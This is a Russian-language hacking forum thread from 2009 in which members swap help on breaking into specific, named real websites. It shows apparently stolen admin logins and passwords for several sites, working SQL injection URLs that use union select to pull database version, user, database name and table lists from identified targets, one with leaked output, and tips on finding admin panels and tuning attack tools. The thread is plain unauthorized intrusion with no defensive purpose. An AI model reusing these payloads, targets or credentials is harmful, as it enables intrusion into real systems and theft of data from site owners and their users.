Ваши вопросы по уязвимостям.

Torentte · 10 Oct 2009

Code:
http://anthropology.ru/admin/
нашел лог и пасс, но чёт не пускает, в чём проблема?
Вот один из логинов dima:123
И сдесь аналогично
Code:
http://ocenshik.mostpp.ru/admin/
policor:112233
Заранее благодарен!

xa-xa89 · 10 Oct 2009

2Nightmarе
если перевести оно не может создать дочерний процесс. а чего не может это уже как говорится извините....

Torentte · 11 Oct 2009

Code:
http://www.sti.ru/acter.php?id=1
Через сипт подобрал таблицы, но данные с них не хотят опубликовыватся
в чём может быть проблема?

//Разобрался: Выводятся через браузер, кто подскажет почему через сипт не хочет?

xa-xa89 · 11 Oct 2009

Torentte said:
Code:
http://www.sti.ru/acter.php?id=1
Через сипт подобрал таблицы, но данные с них не хотят опубликовыватся
в чём может быть проблема?

//Разобрался: Выводятся через браузер, кто подскажет почему через сипт не хочет?
Click to expand...
http://www.sti.ru/acter.php?id=-1+union+select+1,version()+--+-

Torentte · 11 Oct 2009

xa-xa89 said:

http://www.sti.ru/acter.php?id=-1+union+select+1,version()+--+-
Click to expand...

у меня в другом проблема, логины у меня выводятся, а пароли почему-то не хотят((

Torentte · 11 Oct 2009

Code:
_http://www.prodnepr.dp.ua
Подскажите где сдесь админка
Заранее спс))

M@ZAX@KEP · 11 Oct 2009

Юзай PelmeskO scanner, может найдёшь

^YaHoo^ · 11 Oct 2009

Здравствуйте помогите пожалуйста с этим сайтом http://www.avtomagnitoly.ru/?bOrdersLook=1' пытался подобрать кол-во полей немогу может через limit юзать?хотя тоже пытался ничего неполучается подскажите пожалуйста в каком направление копать скулу!

Pashkela · 11 Oct 2009

А в чем разница твоей сслыки и вот этой?

http://www.avtomagnitoly.ru/?bOrdersLook=1
Click to expand...

^YaHoo^ · 11 Oct 2009

http://www.avtomagnitoly.ru/?bOrdersLook=1' на той которой дал показал что там скула и спрашиваю в каком направление расшарить её!

xa-xa89 · 11 Oct 2009

Разницы между твоей страничкой и страничкой которую дал пашкела никакой и скули там никакой!

SeNaP · 11 Oct 2009

^YaHoo^ said:

http://www.avtomagnitoly.ru/?bOrdersLook=1' на той которой дал показал что там скула и спрашиваю в каком направление расшарить её!
Click to expand...

Это не SQl inj.
ТС ты чуиш разницу между этим
http://www.avtomagnitoly.ru/?bOrdersLook=1'
и этим
http://www.avtomagnitoly.ru/?bOrdersLook=1
Как я вижу, разницы здесь нет
т.е. на запрос нельзя повлеять т.к. нет выводимых полей и сам скрипт функцианирует неправельно

Tigger · 11 Oct 2009

^YaHoo^ said:

http://www.avtomagnitoly.ru/?bOrdersLook=1' на той которой дал показал что там скула и спрашиваю в каком направление расшарить её!
Click to expand...

Тама скули нету.
Зато она есть здесь:
http://www.avtomagnitoly.ru/?strSearchForValue=1'/**/union/**/select/**/concat_ws(0x3a,version(),user(),database())/*

5.0.27:eshop@localhost:eshop-avtomagnitoly

wolmer · 12 Oct 2009

Как боротся с такими каракулями чтобы был нормальный html ответ?

К примеру: http://img185.imageshack.us/img185/3456/20699052.jpg

Если же взять другой сендер то какой лучше брать для этого дела?

ElteRUS · 12 Oct 2009

wolmer said:

Как боротся с такими каракулями чтобы был нормальный html ответ?

К примеру: http://img185.imageshack.us/img185/3456/20699052.jpg

Если же взять другой сендер то какой лучше брать для этого дела?
Click to expand...

Удали Accept-Encoding. Всю стороку нафиг с пакета

TELO · 12 Oct 2009

Скажите пожалуйста, а может быть такое что паролей на админку нет в базе?
Перерыл уже всё что можна, нашол только на юзеров.
Вот таблы:
Code:
http://www.berdyansk.su/view_news.php?id_news=-12573%20union%20select%201,2,3,4,5,group_concat%28table_name+separator+0x0a%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20FROM%20INFORMATION_SCHEMA.TABLES+where+table_schema=0x6265726479616e735f676f72706f7274616c%20--

DrAssault · 12 Oct 2009

TELO said:
Скажите пожалуйста, а может быть такое что паролей на админку нет в базе?
Перерыл уже всё что можна, нашол только на юзеров.
Вот таблы:
Code:
http://www.berdyansk.su/view_news.php?id_news=-12573%20union%20select%201,2,3,4,5,group_concat%28table_name+separator+0x0a%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20FROM%20INFORMATION_SCHEMA.TABLES+where+table_schema=0x6265726479616e735f676f72706f7274616c%20--
Click to expand...
Конечно может

Krist_ALL · 12 Oct 2009

пароль может быть в файле или щашит в сам скрипт.

DrAssault · 12 Oct 2009

Что самое интересное, я эту скулю крутил буквально, то ли вчера, то ли позавчера и там на админке была бэйсик авторизация, а сейчас нет чудеса ёпт

xa-xa89 · 12 Oct 2009

А может вообще храниться в другой базе с другим юзером куда прав через попасть через эту скулю нет.Но это как вариант)

Ваши вопросы по уязвимостям.

Torentte New Member

xa-xa89 Elder - Старейшина

Torentte New Member

xa-xa89 Elder - Старейшина

Torentte New Member

Torentte New Member

M@ZAX@KEP Member

^YaHoo^ Banned

Pashkela Динозавр

^YaHoo^ Banned

xa-xa89 Elder - Старейшина

SeNaP Elder - Старейшина

Tigger Elder - Старейшина

wolmer Member

ElteRUS Elder - Старейшина

TELO Member

DrAssault Member

Krist_ALL Banned

DrAssault Member

xa-xa89 Elder - Старейшина

Useful Searches

Ваши вопросы по уязвимостям.

Torentte New Member

xa-xa89 Elder - Старейшина

Torentte New Member

xa-xa89 Elder - Старейшина

Torentte New Member

Torentte New Member

M@ZAX@KEP Member

^YaHoo^ Banned

Pashkela Динозавр

^YaHoo^ Banned

xa-xa89 Elder - Старейшина

SeNaP Elder - Старейшина

Tigger Elder - Старейшина

wolmer Member

ElteRUS Elder - Старейшина

TELO Member

DrAssault Member

Krist_ALL Banned

DrAssault Member

xa-xa89 Elder - Старейшина